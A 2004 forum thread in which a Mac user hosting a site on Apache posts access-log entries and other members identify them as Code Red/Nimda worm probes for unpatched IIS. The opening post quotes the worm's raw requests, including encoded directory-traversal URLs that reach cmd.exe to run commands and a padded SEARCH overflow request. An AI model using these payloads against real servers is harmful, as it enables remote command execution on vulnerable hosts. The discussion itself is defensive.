Stupid windoz hackers... an annoiance, but should I be worried about my server?

Discussion in 'General Mac Discussion' started by walkingmac, Apr 5, 2004.

  1. walkingmac macrumors 6502

    walkingmac

    Joined:
    Mar 30, 2003
    Location:
    Greater Cincinnati
    #1
    ok... so I take advantage of the fact that I have Apache ready to use on my nice Mac OS X PowerMac and host my own website.

    I also like to know what is going on with my site and who is accessing what. So I have my access.log displayed on my desktop with *GeekTool*.

    Every so often I get blips like this that also send my CPU screaming for a few minutes.:
    12.220.19.2 - - [05/Apr/2004:03:42:48 -0400] "SEARCH /\x90\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\ ...and on and on a couple of thousand times... x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\ ...like 10,000 more of these or so.... \x90\x90\x90" 414 363

    Is this a flood or something else?

    and I get these alot:
    12.220.22.9 - - [04/Apr/2004:23:13:32 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 302
    12.220.22.9 - - [04/Apr/2004:23:13:32 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 300
    12.220.22.9 - - [04/Apr/2004:23:13:32 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
    12.220.22.9 - - [04/Apr/2004:23:13:32 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
    12.220.22.9 - - [04/Apr/2004:23:13:32 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324
    12.220.22.9 - - [04/Apr/2004:23:13:32 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341
    12.220.22.9 - - [04/Apr/2004:23:13:32 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341
    12.220.22.9 - - [04/Apr/2004:23:13:33 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 357
    12.220.22.9 - - [04/Apr/2004:23:13:33 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
    12.220.22.9 - - [04/Apr/2004:23:13:33 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
    12.220.22.9 - - [04/Apr/2004:23:13:33 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
    12.220.22.9 - - [04/Apr/2004:23:13:33 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
    12.220.22.9 - - [04/Apr/2004:23:13:33 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 307
    12.220.22.9 - - [04/Apr/2004:23:13:33 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 307
    12.220.22.9 - - [04/Apr/2004:23:13:34 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324
    12.220.22.9 - - [04/Apr/2004:23:13:34 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324

    I look up the IP address and it says this is somewhere in Lexington KY.
    Any help?
     
  2. Westside guy macrumors 601

    Westside guy

    Joined:
    Oct 15, 2003
    Location:
    The soggy side of the Pacific NW
    #2
    This person (or people) is looking for Internet Information Server (Microsoft's Webserver). It's easier to just bang away at any machine listening on port 80 than it is to determine the type of server first. You needn't worry about these sorts of attacks (even if you were running Apache on Windows rather than OS X).

    I should amend my first sentence though. They're looking for unpatched IIS boxes, which also would include a lot of Windows desktop boxes since many configurations of NT and 2000 would enable IIS by default.
     
  3. walkingmac thread starter macrumors 6502

    walkingmac

    Joined:
    Mar 30, 2003
    Location:
    Greater Cincinnati
    #3
    ok so the endless numbers that eat my CPU for a little bit is ALSO a M$ Webserver thing?
     
  4. tomf87 macrumors 65816

    tomf87

    Joined:
    Sep 10, 2003
    #4
    Actually that looks like the goofy worm that was out not too long ago. Nimda or CodeRed, I can't remember which did what. Most likely, the person doesn't know their machine is infected.
     
  5. Jeewhizz macrumors regular

    Joined:
    Nov 30, 2003
    Location:
    London, UK
  6. 7on macrumors 601

    7on

    Joined:
    Nov 9, 2003
    Location:
    Dress Rosa
    #6
    Would turning on the firewall stop such attacks to affect CPU speed?
     
  7. tomf87 macrumors 65816

    tomf87

    Joined:
    Sep 10, 2003
    #7
    No because the firewall works on the port level (level 4) not level 5, so any port 80 request would be allowed through.
     
  8. Jeewhizz macrumors regular

    Joined:
    Nov 30, 2003
    Location:
    London, UK
    #8
    depending on how you use it, you could just move apache to say port 81, close port 80 on the firewall, and then access apache via http://127.0.0.1:81/

    Jee
     
  9. walkingmac thread starter macrumors 6502

    walkingmac

    Joined:
    Mar 30, 2003
    Location:
    Greater Cincinnati
    #9
    It's not that it bothers me that it is logged (i like the fact that I can see whats going on atleast) rather that it is affecting my system's performance. I don't see the value in moving my port. Is it just they are banging away at anything listening to 80 specifically or is it through my website (which ofcourse if on port 80)? How will moving my port to 81 affect my website? Would this then require something different then my current system of updating my IP address to the DNS? (sorry I don't know a whole lot about this stuff besides turning on and setting up services and making the websites :eek: )
     
  10. Jeewhizz macrumors regular

    Joined:
    Nov 30, 2003
    Location:
    London, UK
    #10
    well i only use apache/mysql on my PC atm for local testing - and for showing clients their work... so its only accessed from outside the network when i give out a link - so i give out http://MY_IPADDRESS:81/client/index.php

    Moving to port 81 would stop most of it, as they will be scanning all ip's on port 80 - which would be blocked by your firewall.

    However, if you use your mac as a server alot, then moving to port 81 wouldn't be a good idea ;)
     
  11. Westside guy macrumors 601

    Westside guy

    Joined:
    Oct 15, 2003
    Location:
    The soggy side of the Pacific NW
    #11
    You're right; it's CodeRed. So it's a hacker once removed. :D

    I wouldn't worry so much about the system impact; but unfortunately if there's enough traffic it can certainly bog down your internet connection. There's not a lot you personally can do about that; and if you ask your ISP to do something about it they'll probably say "you know, you're not supposed to be running any sort of server on our lines". :p
     
  12. superbovine macrumors 68030

    superbovine

    Joined:
    Nov 7, 2003
    #12
    google for how to make a host.deny file and add the ip to your host.deny file.
     

Share This Page